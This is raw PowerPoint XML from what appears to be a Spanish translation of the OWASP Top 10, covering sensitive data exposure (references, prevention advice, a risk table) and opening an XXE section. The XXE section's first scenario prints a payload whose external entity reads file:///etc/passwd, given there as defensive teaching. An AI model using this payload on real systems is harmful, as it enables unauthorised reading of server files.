                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>seguridad de la comunicaciones (V10) del ASVS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="83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200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="10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9"/>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0"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Protect Data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="880" u="sng"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880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>V7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="880" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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1"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="880" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>Cheat Sheet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="880" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Transport Layer Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="88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2"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: User Privacy Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="880" u="sng"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3"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheets: Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>Cryptographic Storage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="88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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>OWASP Security Headers Project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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>Cheat Sheet: HSTS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="88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7"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for weak cryptography</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="880" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Externos</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId18"/>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9"/>
              </a:rPr>
              <a:t>CWE-220: Exposure of sens. information through data queries</a:t>
            </a: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19"/>
              </a:rPr>
              <a:t>CWE-310: Cryptographic Issues</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="880" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>CWE-311: Missing Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="880" u="sng"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21"/>
              </a:rPr>
              <a:t>CWE-312: Cleartext Storage of Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="880" u="sng"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22"/>
              </a:rPr>
              <a:t>CWE-319: Cleartext Transmission of Sensitive Information</a:t>
            </a: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23"/>
              </a:rPr>
              <a:t>CWE-326: Weak Encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="880" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="880" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId23"/>
              </a:rPr>
              <a:t>CWE-327: Broken/Risky Crypto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="880" u="sng"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880" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId24"/>
              </a:rPr>
              <a:t>CWE-359: Exposure of Private Information (Privacy Violation)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="88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200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Como mínimo, siga las siguientes recomendaciones y consulte las referencias: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Clasifique los datos procesados, almacenados o transmitidos por el sistema. Identifique qué información es sensible de acuerdo a las regulaciones, leyes o requisitos del negocio y del país.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Aplique los controles adecuados para cada clasificación.</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No almacene datos sensibles innecesariamente. Descártelos tan pronto como sea posible o utilice un sistema de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId25"/>
              </a:rPr>
              <a:t>tokenizacion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId25"/>
              </a:rPr>
              <a:t> que cumpla con PCI DSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Los datos que no se almacenan no pueden ser robados.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Cifre todos los datos sensibles cuando sean almacenados.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Cifre todos los datos en tránsito utilizando protocolos seguros como TLS con cifradores que utilicen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Perfect Forward Secrecy (PFS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>priorizando los algoritmos en el servidor. Aplique el cifrado utilizando directivas como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>HTTP Strict Transport Security (HSTS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" sz="83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Utilice únicamente algoritmos y protocolos estándares y fuertes e implemente una gestión adecuada de claves. No cree sus propios algoritmos de cifrado.</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Deshabilite el almacenamiento en cache de datos sensibles.</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Almacene contraseñas utilizando funciones de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hashing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> adaptables con un factor de trabajo (retraso) además de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SALT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId26"/>
              </a:rPr>
              <a:t>Argon2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId27"/>
              </a:rPr>
              <a:t>scrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId28"/>
              </a:rPr>
              <a:t>bcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId29"/>
              </a:rPr>
              <a:t>PBKDF2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-AR" sz="83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30" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Verifique la efectividad de sus configuraciones y parámetros de forma independiente.</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A3</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t>Exposición de Datos Sensibles</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" noProof="0"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28246807"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="939600"/>
          <a:ext cx="6836400" cy="2246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Explotabilidad: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419" sz="900" b="1" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalencia</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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9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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectabilidad: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Técnico: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0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="860" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>En lugar de atacar la criptografía, los atacantes roban claves, ejecutan ataques </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="860" i="1" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Man in the Middle</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="860" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> o roban datos en texto plano del servidor, en tránsito, o desde el cliente. Se requiere un ataque manual pero pueden utilizase bases de datos con </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="860" i="1" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>hashes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="860" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> que han sido hechas públicas para obtener las contraseñas originales utilizando GPUs.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="86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es-AR" sz="860" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>En los últimos años, este ha sido el ataque de mayor impacto. El error más común es simplemente no cifrar los datos sensibles. Cuando se emplea criptografía, es común la generación y gestión de claves, algoritmos, cifradores y protocolos débiles. En particular algoritmos débiles de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="860" i="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>hashing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="860" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> para el almacenamiento de contraseñas. Para los datos en tránsito las debilidades son fáciles de detectar, mientras que para los datos almacenados es muy difícil. Ambos tienen una explotabilidad muy variable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="860" dirty="0">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es-AR" sz="860" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Los fallos con frecuencia comprometen datos que deberían estar protegidos. Típicamente, esta información incluye Información Personal Sensible (PII) como registros de salud, datos personales, credenciales y tarjetas de crédito, que a menudo requieren mayor protección, según lo definido por las leyes o reglamentos como el </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="860" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId30"/>
                        </a:rPr>
                        <a:t>PIBR de la UE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="860" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> o las leyes locales de privacidad.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="86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200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-AR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Han sido publicados numerosos XXE, incluyendo ataques a dispositivos embebidos. Los XXE ocurren en una gran cantidad de lugares inesperados, incluyendo dependencias profundamente anidadas. La manera más fácil es cargar un archivo XML malicioso, si es aceptado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Escenario #1</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el atacante intenta extraer datos del servidor</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marL="90488">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>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&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>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&lt;!DOCTYPE foo [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>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&lt;!ELEMENT foo ANY&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="180975">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="90488">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>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&lt;foo&gt;&amp;xxe;&lt;/foo&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
